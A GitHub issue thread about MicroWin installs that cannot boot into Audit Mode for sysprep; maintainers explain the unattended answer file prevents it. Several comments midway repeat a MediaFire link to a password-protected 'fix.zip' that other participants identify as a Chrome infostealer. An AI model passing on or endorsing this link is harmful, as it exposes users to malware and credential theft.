### ISSUE TITLE
[MicroWin] Cannot boot into Audit Mode / sysprep

### ISSUE THREAD

**Issue by CrazyWolf13** [ChrisTitusTech/winutil#2626]
## Describe the bug
When installing on a VM, syspre is often used to later create templates.
Launching sysprep is possible when being at the language selector after the first windows reboot, when pressing `Ctrl+Shift+F3`

Normally Windows reboots and logs in as Administrator and launches the sysprep tool, but with MicroWin the sysprep does not start instead this error popps up: 
![grafik](https://github.com/user-attachments/assets/21713751-f711-46c4-aad0-d5b058a11c31)
When pressing OK windows ends up in a reboot loop with an error, windows could not be installed correctly.

## To Reproduce
1. Use MicroWin ISO
2. Get to Language selector
3. Press `Ctrl+Shift+F3` for sysprep
5. Press OK
6. See reboot loop

## Expected behavior
Sysprep should be fully working on MicroWin

**Comment by CodingWonders** [comment]
MicroWin is meant to be fully automated, so you aren't supposed to enter Audit Mode.

What language selector screen do you see?

**Comment by CrazyWolf13** [comment]
Basically just right after you see the White UI, after the first reboot press `Ctrl+Shift+F3`

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CrazyWolf13** [comment]
No, sir, I aint gonna download some random mediafire file, without even getting an explanation what it does.

**Comment by CrazyWolf13** [comment]
@ChrisTitusTech  Is this some sort of scam? Some random files from Russia ?

**Comment by CodingWonders** [comment]
>  Is this some sort of scam? Some random files from Russia ?

@CrazyWolf13, probably. Don't run it - it could be an infostealer

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CrazyWolf13** [comment]
@ChrisTitusTech  It's probably worth somewhat blocking them here, before they get real people to download stuff.

Yep it's a google chrome infostealer -> https://app.any.run/tasks/1f3b42b6-9353-46c5-bdcd-35a8e0d9991c

**Comment by CodingWonders** [comment]
> Yep it's a google chrome infostealer

@CrazyWolf13, I'm fed up with these pieces of malware. Going back to the starting topic, VirtIO can be downloaded manually, but we could add VM support. The underpinnings of the unattended answer file ([Christoph Schneegans' generator](https://schneegans.de/windows/unattend-generator)) contain virtual machine support.

Perhaps we could add that in the future

**Comment by CrazyWolf13** [comment]
Oh that seems awesome!

Basically I mostly just use it to do the following:
- Run windows updates
- Run MS Store Updates
- (Remove nearly all applications(bloat))
- Run disk cleanup (+defrag)
- Reboot

To get a freshly updated as small as possible VM template.


But going back to the cause, is there any specific reason, the sysprep did not load on startup ?

**Comment by CodingWonders** [comment]
> But going back to the cause, is there any specific reason, the sysprep did not load on startup ?

No idea

**Comment by CrazyWolf13** [comment]
hmm not really stale, still waiting for an explanation or fix.

**Comment by CodingWonders** [comment]
VirtIO driver support is now included with the latest version of MicroWin, and the unattended answer file doesn't allow loading audit mode due to its unattended nature.

This can be fixed by manually modifying the answer file to make one of the screens in the OOBE interactive, allowing you to press CTRL+Shift+F3, but I'm not sure if everyone wants to do this.

/close
